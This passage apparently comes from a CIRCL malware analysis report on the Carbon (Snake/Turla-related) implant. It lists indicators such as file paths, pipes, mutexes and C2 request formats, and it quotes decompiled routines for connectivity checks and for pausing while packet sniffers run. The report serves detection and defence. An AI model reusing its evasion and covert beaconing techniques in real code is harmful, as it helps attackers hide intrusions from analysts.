| enc (2) | x | ||
| reliable (2) | x | ||
| frag | x | x | x | 
| m2b (2) | x | x | |
| m2d (2) | x | ||
| t2m (3) | x | ||
| udp (4) | x | ||
| doms (4) | x | ||
| domc (4) | x | 
frag.np and frag.tcp replies:
SEND AUTH
RECV AUTH
AUTH FAILED
SEND WHO
SEND OBJECT_ID
frag.np/frag.tcp options:
frag_size=32768
frag_no_scrambling=1
allow=*everyone
active_con
net_user=
net_password=
write_peer_nfo=%c%s%c
nodelay=N
Files from cryptoapi.dll
\\.\IdeDrive1\
\\.\IdeDrive1\log.txt
\\.\IdeDrive1\*.bak
\\.\IdeDrive1\Tasks\\task.txt
\\.\IdeDrive1\Tasks\\task_system.txt
\\.\IdeDrive1\Tasks\\*.tmp
\\.\IdeDrive1\config.txt
\\.\IdeDrive1\restrans.txt
\\.\IdeDrive1\Tasks\\
\\.\IdeDrive1\Results\\
\\.\IdeDrive1\logtrans.txt
\\.\IdeDrive1\usbdev.bak
\\.\IdeDrive1\inetpub.bak
\\.\IdeDrive1\inetpub.dll
\\.\IdeDrive1\cryptoapi.bak
\\.\IdeDrive1\cryptoapi.dll
\\.\IdeDrive1\Plugins\\
Pipes from cryptoapi.dll
\\\\.\\Global\\PIPE\\comnode
\\\\%s\\pipe\\comnode
\\\\%s\\pipe\\%s
Custom error codes, shared in sample B, C and D (E and F to be check)
 CUSTOM_ERROR_01  = 21590001h
 CUSTOM_ERROR_02  = 21590002h            ; WAIT_TIMEOUT?
 CUSTOM_ERROR_03  = 21590003h            ; BROKEN_PIPE?
 CUSTOM_ERROR_04  = 21590004h            
 CUSTOM_ERROR_05  = 21590005h
 CUSTOM_ERROR_06  = 21590006h
 CUSTOM_ERROR_07  = 21590007h
 CUSTOM_ERROR_08  = 21590008h
 CUSTOM_ERROR_09  = 21590009h
 CUSTOM_ERROR_0A  = 2159000Ah
 CUSTOM_ERROR_0B  = 2159000Bh            ; INVALID_USER_BUFFER?
 CUSTOM_ERROR_0D  = 2159000Dh
 CUSTOM_ERROR_64  = 21590064h
 CUSTOM_ERROR_65  = 21590065h
 CUSTOM_ERROR_66  = 21590066h
 CUSTOM_ERROR_67  = 21590067h
 CUSTOM_ERROR_68  = 21590068h
 CUSTOM_ERROR_69  = 21590069h
 CUSTOM_ERROR_C9  = 215900C9h            ; NO_VALID_ADDR?
 CUSTOM_ERROR_CA  = 215900CAh            ; NO_VALID_PORT?
 CUSTOM_ERROR_CB  = 215900CBh
 CUSTOM_ERROR_CC  = 215900CCh
Sample C - inetpub.dll (Resource: 102)
Original filename: CARBON.dll
Internal name: Carbon v3.51
Files from inetpub.dll
\\.\IdeDrive1\config.txt
\\.\IdeDrive1\Tasks\\task.txt
\\.\IdeDrive1\Tasks\\task_system.txt
\\.\IdeDrive1\log.txt
\\.\IdeDrive1\Results\result.txt
Mutexes from inetpub.dll
Global\\MSMMC.StartupEnvironment.PPT
Global\\411A5195CD73A8a710E4BB16842FA42C
Global\\881F0621AC59C4c035A5DC92158AB85E
Global\\MSCTF.Shared.MUTEX.RPM
Global\\WindowsShellHWDetection
Global\\MSDBG.Global.MUTEX.ATF
thread 2:
In a 10 minutes loop check server availability by doing a HTTP POST (HTTP/1.0) to a server/port configured in
\\.\IdeDrive1\config.txt
in CW_INET section address with user agent
Mozilla/4.0 (compatible; MSIE 6.0)
but only if a valid internet connection was successfully probed:
1char isInternetConnectionWorking() 2{ 3 char result; 4 HINTERNET hInternetOpen; 5 6 result = 0; 7 if ( InternetAttemptConnect(0) ) 8 { 9 result = 0; 10 } 11 else 12 { 13 hInternetOpen = InternetOpenA("Mozilla/4.0 (compatible; MSIE 6.0)", 0, 0, 0, 0); 14 if ( hInternetOpen ) 15 { 16 if ( HttpConnect(hInternetOpen, "update.microsoft.com") 17 || HttpConnect(hInternetOpen, "windowsupdate.microsoft.com") 18 || HttpConnect(hInternetOpen, "207.46.18.94") 19 || HttpConnect(hInternetOpen, "207.46.253.125") 20 || HttpConnect(hInternetOpen, "microsoft.com") 21 || HttpConnect(hInternetOpen, "207.46.250.119") 22 || HttpConnect(hInternetOpen, "207.46.249.56") 23 || HttpConnect(hInternetOpen, "207.46.249.57") ) 24 result = 1; 25 InternetCloseHandle(hInternetOpen); 26 } 27 else 28 { 29 result = 0; 30 } 31 } 32 return result; 33}
thread 3:
The actions described below are only taken if the following programs are not running
- tcpdump.exe
- windump.exe
- ethereal.exe
- wireshark.exe
- ettercap.exe
- snoop.exe
The following is the main (endless) loop of this thread:
1LOOP: 2 if ( do_HTTP_GET(hInternetConnect, &base_string) ) 3 { 4 while ( isCapturingPackets() == 1 ) 5 Sleep(0xEA60u); 6 while ( sub_20009871(hInternetConnect, ::Dest, &lpszServerName, &base_string) ) 7 ; 8 while ( sub_200075C0(hInternetConnect, ::Dest, &lpszServerName, &base_string) ) 9 Sleep(0x3E8u); 10 goto LOOP; 11 }
It starts in do_HTTP_GET() with a HTTP GET (HTTP/1.1) to server/port taken from
\\.\IdeDrive1\config.txt
in CW_INET section address with user agent
Mozilla/4.0 (compatible; MSIE 6.0)
with script name and query as follows:
auth.cgi?mode=query&id=%u:%u:%u:%u&serv=%s&lang=en&q=%u-%u&date=%s
where the format strings are filled in accordingly.
serv=
is filled pseudorandomly with a host from the following list:
- www.yahoo.com
- www.bbc.com
- www.astalavista.com
- www.google.com
- www.eagames.com
- www.asus.com
- www.microsoft.com
- windowsupdate.microsoft.com
- search.microsoft.com
- www.hp.com
- www.altavista.com
- www.3com.com
- www.dell.com
- www.sun.com
- www.easports.com
- search.google.com
perhaps to make a reasonable appearance or to mislead log analysts who filter out common domain names.
When a successful handle is returned, a file is being downloaded and stored in the virtual file system.
What follows is a GET in HTTP/1.0 on
default.asp?act=%u&id=%u&item=%u&event_id=%u&cln=%u&flt=%u&serv=%s&t=%ld&mode=query&lang=en&date=%s
This code is part of sub_20009871, which continues to serve the frag.np/frag.tcp part.
In sub_200075C0 another POST in HTTP/1.0 to
default.asp?act=%u&id=%u&item=%u&event_id=%u&cln=%u&flt=%u&serv=%s&t=%ld&mode=query&lang=en&date=%s
follows.
The purpose of the two functions is not clear, yet.
load_transports()
In this module, the following transport or communication modules are present:
- Type 1: tcp, b2m
- Type 2: np, frag, m2b
This corresponds to the transports found in Sample D.
3rd party code
bzip2/libbzip2
The compiled code of bzip2/libbzip2, a program and library for lossless block-sorting data compression, was identified, coming from http://svn.apache.org/repos/asf/labs/axmake/trunk/src/libuc++/srclib/bzip2/compress.c.
bzip2/libbzip2 version 1.0.5 of 10 December 2007
Copyright (C) 1996-2007 Julian Seward jseward@bzip.org
Using the source code without including the author’s Copyright statement, the conditions and the disclaimer is an infringement of the software license:
http://svn.apache.org/repos/asf/labs/axmake/trunk/src/libuc++/srclib/bzip2/LICENSE
Other analysis
Analysis of check-in messages
Check-in messages of Sample C and D (unique)
$Id: b2_to_m2_stub.c 5273 2007-01-23 17:41:15Z vlad $
$Id: b_tcp.c 8474 2007-09-19 15:40:39Z vlad $
$Id: hide_module_win32.c 10189 2008-11-25 14:25:41Z gilg $
$Id: l1_check.c 4477 2006-08-28 15:58:21Z vlad $
$Id: load_lib_win32.c 10180 2008-11-20 12:13:01Z gilg $
$Id: m2_to_b2_stub.c 4477 2006-08-28 15:58:21Z vlad $
$Id: m_frag.c 8715 2007-11-29 16:04:46Z urik $
$Id: m_np.c 8825 2008-01-10 13:13:15Z vlad $
$Id: mutex.c 3940 2006-03-20 16:47:16Z vlad $
$Id: np_win32_common.c 4483 2006-08-30 13:13:51Z vlad $
$Id: rw_lock.c 4482 2006-08-30 13:07:14Z vlad $
$Id: t_byte1.c 5324 2007-01-30 12:45:35Z vlad $
$Id: t_manager.c 8715 2007-11-29 16:04:46Z urik $
$Id: t_message1.c 5290 2007-01-26 11:15:03Z vlad $
$Id: t_status.c 5666 2007-03-19 16:18:00Z vlad $
$Id: t_utils.c 5503 2007-02-26 13:14:30Z vlad $
$Id: thread.c 4593 2006-10-12 11:43:29Z urik $
Developers
Sample C and D contain author names of three people:
- vlad
- gilg
- urik
Newer samples, for instance the one from BAE, contain only two:
- vlad
- gilg
Check-in period
First check-in: 2006-03-20
Last check-in: 2008-11-25
Check-in dates

When incorporating the check-in dates of the BAE sample, the following graph shows that someone checked-in a file once during a Saturday.

Language deficits
A small collection of strings demonstrates the language deficits, mainly distinguishable as:
- Use of backticks instead of apostrophes by some of the developers
- Problems using past tense by some developers
- Spelling
- Mistranslated terms
- Oversights
Examples:
win32 detect...
x64 detect...
CretaFileA(%s):
Can`t open SERVICES key
error has been suddenly occured
timeout condition has been occured inside call of function
OPER|Survive me, i`m close to death... free space less than 5%%...|\n
OPER|Sniffer '%s' running... ooopppsss...|\n
Task not execute. Arg file failed.
Update failed =((  Can`t create file.
can`t get characs.\n
Internal command not support =((\n
L|-1|can`t get characs %s|\n
Recommendations
- CIRCL recommends to review the IOCs of this report and compare them with servers in the infrastructure of your organization which produce log files including proxies, A/V and system logs. As this family of malware might be difficult to detect from a network perspective, we recommend to perform check of the indicators at the system level.
Classification of this document
TLP:WHITE information may be distributed without restriction, subject to copyright controls.
Revision
- Version 0.9 July 10, 2014 work-in-progress (not a final release) (TLP:WHITE)
References
- 
      http://info.baesystemsdetica.com/rs/baesystems/images/snake_whitepaper.pdf ↩ 
- 
      http://www.symantec.com/security_response/writeup.jsp?docid=2009-110919-1741-99&tabid=2 ↩ 
- 
      http://blog.threatexpert.com/2008/11/agentbtz-threat-that-hit-pentagon.html ↩ 
- 
      http://msdn.microsoft.com/en-us/library/windows/desktop/ms684914(v=vs.85).aspx ↩ 
 
                                